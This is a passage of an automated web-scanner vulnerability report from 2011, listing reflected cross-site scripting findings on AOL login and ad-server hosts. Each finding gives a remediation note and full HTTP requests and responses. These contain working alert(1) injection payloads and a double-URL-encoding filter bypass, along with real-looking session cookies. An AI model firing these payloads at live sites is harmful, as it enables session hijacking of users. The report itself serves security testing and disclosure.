Set-Cookie: OPR_SC=diAxLjAga2lkIDAgUWtnaFZheXBieUMzVFM2TUwrK29JaTIzd1pRPQ%3D%3D-NcFbxVvZ3cH4d3%2Bx%2BogHkrjcziFFwz%2Bb; Domain=account.login.aol.com; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Length: 2894



...[SNIP]...
fxID="sso";
s_265.pageName="sso : badbrowser";
s_265.channel="us.snssignin";
s_265.prop1='ssologin';
s_265.prop12="/opr/badbrowser.jsp";
s_265.prop15="bm9uZQ%3D%3D";
s_265.prop17="std";
s_265.prop18="S7bfe9";0e2921fad4a";
s_265.prop19="vl6";
s_265.prop20="en-us";
var s_code=s_265.t();
if(s_code)document.write(s_code);
//-->
...[SNIP]...

5.17. https://account.login.aol.com/opr/_cqr/opr/opr.psp [authLev parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://account.login.aol.com
Path:   /opr/_cqr/opr/opr.psp

Issue detail

The value of the authLev request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4481%2522%253bea66b28391e was submitted in the authLev parameter. This input was echoed as f4481";ea66b28391e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the authLev request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /opr/_cqr/opr/opr.psp?sitedomain=bill.aol.com&authLev=Sf4481%2522%253bea66b28391e&siteState=OrigUrl%3Dhttps%253A%252F%252Fbill.aol.com%252FSPortal%252Fjsp%252Fmain.jsp&lang=en&locale=us HTTP/1.1
Host: account.login.aol.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617160633-Repeat%7C1367689160633%3B%20s_nrgvo%3DRepeat%7C1367689160634%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:44:15 GMT
Pragma: No-cache
Cache-Control: no-cache,no-store,max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: OPR_SC=diAxLjAga2lkIDAgUWtnaFZheXBieUMzVFM2TUwrK29JaTIzd1pRPQ%3D%3D-NcFbxVvZ3cH4d3%2Bx%2BogHkrjcziFFwz%2Bb; Domain=account.login.aol.com; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Length: 2894



...[SNIP]...
fxID="sso";
s_265.pageName="sso : badbrowser";
s_265.channel="us.snssignin";
s_265.prop1='ssologin';
s_265.prop12="/opr/badbrowser.jsp";
s_265.prop15="bm9uZQ%3D%3D";
s_265.prop17="std";
s_265.prop18="Sf4481";ea66b28391e";
s_265.prop19="vl6";
s_265.prop20="en-us";
var s_code=s_265.t();
if(s_code)document.write(s_code);
//-->
...[SNIP]...

5.18. http://ad.doubleclick.net/adj/huffpost.premium/front [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/huffpost.premium/front

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20afb'-alert(1)-'1fde27dc36e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/huffpost.premium/front;global=1;cap_12=n;;plat=win;br=ch;bv=11;subbv=0;load_mode=inline;page_type=homepage;pos=pushdown;dcopt=ist;u=970x418%7Chomepage%7Cpushdown%7C%7C%7C%7C%7C%7C%7C%7C;sz=970x418;tile=1;ord=18505141?&20afb'-alert(1)-'1fde27dc36e=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 05 May 2011 00:59:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 495

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3afe/0/0/%2a/g;44306;0-0;0;19141241;31519-970/418;0/0/0;u=970x418|homepage|pushdown||||||||;~okv=;global=1;cap_12=n;;plat=win;br=ch;bv=11;subbv=0;load_mode=inline;page_type=homepage;pos=pushdown;dcopt=ist;u=970x418|homepage|pushdown||||||||;sz=970x418;tile=1;;20afb'-alert(1)-'1fde27dc36e=1;~aopt=2/1/ff/1;~sscs=%3f">
...[SNIP]...

5.19. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 2b6fc<script>alert(1)</script>6725a804ac9 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1505691&pid=19907672b6fc<script>alert(1)</script>6725a804ac9&ps=-1&zw=627&zh=195&url=http%3A//www.dailyfinance.com/%3Ficid%3Dnavbar_finance_main5&v=5&dct=Forrester%20Research%20To%20Broadcast%20Its%20First-Quarter%20-gs%20Conference%20Call%20Via%20The%20Internet%20-%20DailyFinance HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/?icid=navbar_finance_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16r4opq1tvlkml; TData=99999%7C53380%7C60490%7C52615%7C60491%7C50507%7C53656%7C55401%7C60506%7C57094%7C51182%7C56673%7C54057%7C56969%7C56835%7C56780%7C50212%7C56987%7C50221%7C50216%7C53575%7C50280%7C60190%7C60183_Mon%2C%2002%20May%202011%2023%3A18%3A39%20GMT

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:20 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2510


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
                   
                   
                                           java.lang.NumberFormatException: For input string: "19907672b6fc<script>alert(1)</script>6725a804ac9"

   
                                                           </head>
...[SNIP]...

5.20. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload 1fb20--><script>alert(1)</script>e17c77c9e55 was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=15056911fb20--><script>alert(1)</script>e17c77c9e55&pid=1990767&ps=-1&zw=627&zh=195&url=http%3A//www.dailyfinance.com/%3Ficid%3Dnavbar_finance_main5&v=5&dct=Forrester%20Research%20To%20Broadcast%20Its%20First-Quarter%20-gs%20Conference%20Call%20Via%20The%20Internet%20-%20DailyFinance HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/?icid=navbar_finance_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16r4opq1tvlkml; TData=99999%7C53380%7C60490%7C52615%7C60491%7C50507%7C53656%7C55401%7C60506%7C57094%7C51182%7C56673%7C54057%7C56969%7C56835%7C56780%7C50212%7C56987%7C50221%7C50216%7C53575%7C50280%7C60190%7C60183_Mon%2C%2002%20May%202011%2023%3A18%3A39%20GMT

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:18 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3306


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "15056911fb20--><script>alert(1)</script>e17c77c9e55" -->
...[SNIP]...

5.21. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload 4192a--><script>alert(1)</script>fc1a324ec2a was submitted in the ps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1505691&pid=1990767&ps=-14192a--><script>alert(1)</script>fc1a324ec2a&zw=627&zh=195&url=http%3A//www.dailyfinance.com/%3Ficid%3Dnavbar_finance_main5&v=5&dct=Forrester%20Research%20To%20Broadcast%20Its%20First-Quarter%20-gs%20Conference%20Call%20Via%20The%20Internet%20-%20DailyFinance HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/?icid=navbar_finance_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16r4opq1tvlkml; TData=99999%7C53380%7C60490%7C52615%7C60491%7C50507%7C53656%7C55401%7C60506%7C57094%7C51182%7C56673%7C54057%7C56969%7C56835%7C56780%7C50212%7C56987%7C50221%7C50216%7C53575%7C50280%7C60190%7C60183_Mon%2C%2002%20May%202011%2023%3A18%3A39%20GMT

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:23 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3745


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "-14192a--><script>alert(1)</script>fc1a324ec2a" -->
   
...[SNIP]...

5.22. http://altfarm.mediaplex.com/ad/js/13198-126290-5934-6 [mpt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13198-126290-5934-6

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21d70'-alert(1)-'9add617d7d3 was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/13198-126290-5934-6?mpt=130457512781021d70'-alert(1)-'9add617d7d3&mpvc=http://ads.undertone.com/c?oaparams=2__bannerid=205196__campaignid=34872__zoneid=4837__UTLCA=1__cb=ca4abfebbce7466da8fa3e33d19908c4__bk=lkp6q0__id=958v7ypkoi5eko377iu95zng2__oadest= HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?zoneid=4837&cb=557126407
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=14302:16279/10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=13198:5934/14302:16279/10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209; expires=Sat, 4-May-2013 4:13:50 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 417
Date: Thu, 05 May 2011 01:00:23 GMT

document.write('<a target="_blank" href="http://ads.undertone.com/c?oaparams=2__bannerid=205196__campaignid=34872__zoneid=4837__UTLCA=1__cb=ca4abfebbce7466da8fa3e33d19908c4__bk=lkp6q0__id=958v7ypkoi5eko377iu95zng2__oadest=http://altfarm.mediaplex.com/ad/ck/13198-126290-5934-6?mpt=130457512781021d70'-alert(1)-'9add617d7d3">
...[SNIP]...

5.23. http://altfarm.mediaplex.com/ad/js/13198-126290-5934-6 [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13198-126290-5934-6

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1cce6'%3balert(1)//bd0628ff781 was submitted in the mpvc parameter. This input was echoed as 1cce6';alert(1)//bd0628ff781 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/13198-126290-5934-6?mpt=1304575127810&mpvc=http://ads.undertone.com/c?oaparams=2__bannerid=205196__campaignid=34872__zoneid=4837__UTLCA=1__cb=ca4abfebbce7466da8fa3e33d19908c4__bk=lkp6q0__id=958v7ypkoi5eko377iu95zng2__oadest=1cce6'%3balert(1)//bd0628ff781 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?zoneid=4837&cb=557126407
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=14302:16279/10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=13198:5934/14302:16279/10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209; expires=Sat, 4-May-2013 4:13:50 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 417
Date: Thu, 05 May 2011 01:00:25 GMT

document.write('<a target="_blank" href="http://ads.undertone.com/c?oaparams=2__bannerid=205196__campaignid=34872__zoneid=4837__UTLCA=1__cb=ca4abfebbce7466da8fa3e33d19908c4__bk=lkp6q0__id=958v7ypkoi5eko377iu95zng2__oadest=1cce6';alert(1)//bd0628ff781http://altfarm.mediaplex.com/ad/ck/13198-126290-5934-6?mpt=1304575127810">
...[SNIP]...

5.24. http://altfarm.mediaplex.com/ad/js/13198-126290-5934-6 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13198-126290-5934-6

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77daa'%3balert(1)//71eb06d6eab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 77daa';alert(1)//71eb06d6eab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/13198-126290-5934-6?mpt=1304575127810&mpvc=http://ads.undertone.com/c?oaparams=2__bannerid=205196__campaignid=34872__zoneid=4837__UTLCA=1__cb=ca4abfebbce7466da8fa3e33d19908c4__bk=lkp6q0__id=958v7ypkoi5eko377iu95zng2__oadest=&77daa'%3balert(1)//71eb06d6eab=1 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?zoneid=4837&cb=557126407
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=14302:16279/10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=13198:5934/14302:16279/10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209; expires=Sat, 4-May-2013 5:34:24 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 420
Date: Thu, 05 May 2011 01:00:26 GMT

document.write('<a target="_blank" href="http://ads.undertone.com/c?oaparams=2__bannerid=205196__campaignid=34872__zoneid=4837__UTLCA=1__cb=ca4abfebbce7466da8fa3e33d19908c4__bk=lkp6q0__id=958v7ypkoi5eko377iu95zng2__oadest=&77daa';alert(1)//71eb06d6eab=1http://altfarm.mediaplex.com/ad/ck/13198-126290-5934-6?mpt=1304575127810">
...[SNIP]...

5.25. http://altfarm.mediaplex.com/ad/js/14302-119028-16279-0 [mpt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/14302-119028-16279-0

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a09e'-alert(1)-'fb0851aaf65 was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/14302-119028-16279-0?mpt=5571245843a09e'-alert(1)-'fb0851aaf65&mpvc=http://at.atwola.com/adlink/5113/1838206/0/6/AdId=1587052;BnId=1;itime=557124584;kvpg=techcrunch;kvugc=0;kvmn=93311128;kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:56148:57362:56673:56835:60203:51186:56780:50220:56768:56299:56987:56969:54057:50229:54063:57144;nodecode=yes;link= HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/14302:29115/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=14302:16279/10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209; expires=Sat, 4-May-2013 4:17:54 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 631
Date: Thu, 05 May 2011 01:00:19 GMT

document.write('<a target="_blank" href="http://at.atwola.com/adlink/5113/1838206/0/6/AdId=1587052;BnId=1;itime=557124584;kvpg=techcrunch;kvugc=0;kvmn=93311128;kvtid=16r4opq1tvlkml;kvseg=99999:53380:6
...[SNIP]...
52841:51182:56419:56148:57362:56673:56835:60203:51186:56780:50220:56768:56299:56987:56969:54057:50229:54063:57144;nodecode=yes;link=http://altfarm.mediaplex.com/ad/ck/14302-119028-16279-0?mpt=5571245843a09e'-alert(1)-'fb0851aaf65">
...[SNIP]...

5.26. http://altfarm.mediaplex.com/ad/js/14302-119028-16279-0 [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/14302-119028-16279-0

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e9d9'%3balert(1)//9b1f5b87858 was submitted in the mpvc parameter. This input was echoed as 3e9d9';alert(1)//9b1f5b87858 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/14302-119028-16279-0?mpt=557124584&mpvc=http://at.atwola.com/adlink/5113/1838206/0/6/AdId=1587052;BnId=1;itime=557124584;kvpg=techcrunch;kvugc=0;kvmn=93311128;kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:56148:57362:56673:56835:60203:51186:56780:50220:56768:56299:56987:56969:54057:50229:54063:57144;nodecode=yes;link=3e9d9'%3balert(1)//9b1f5b87858 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/14302:29115/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=14302:16279/10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209; expires=Sat, 4-May-2013 4:34:58 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 630
Date: Thu, 05 May 2011 01:00:21 GMT

document.write('<a target="_blank" href="http://at.atwola.com/adlink/5113/1838206/0/6/AdId=1587052;BnId=1;itime=557124584;kvpg=techcrunch;kvugc=0;kvmn=93311128;kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:56148:57362:56673:56835:60203:51186:56780:50220:56768:56299:56987:56969:54057:50229:54063:57144;nodecode=yes;link=3e9d9';alert(1)//9b1f5b87858http://altfarm.mediaplex.com/ad/ck/14302-119028-16279-0?mpt=557124584">
...[SNIP]...

5.27. http://altfarm.mediaplex.com/ad/js/14302-119028-16279-0 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/14302-119028-16279-0

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f41e2'%3balert(1)//ab4d8722cb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f41e2';alert(1)//ab4d8722cb9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

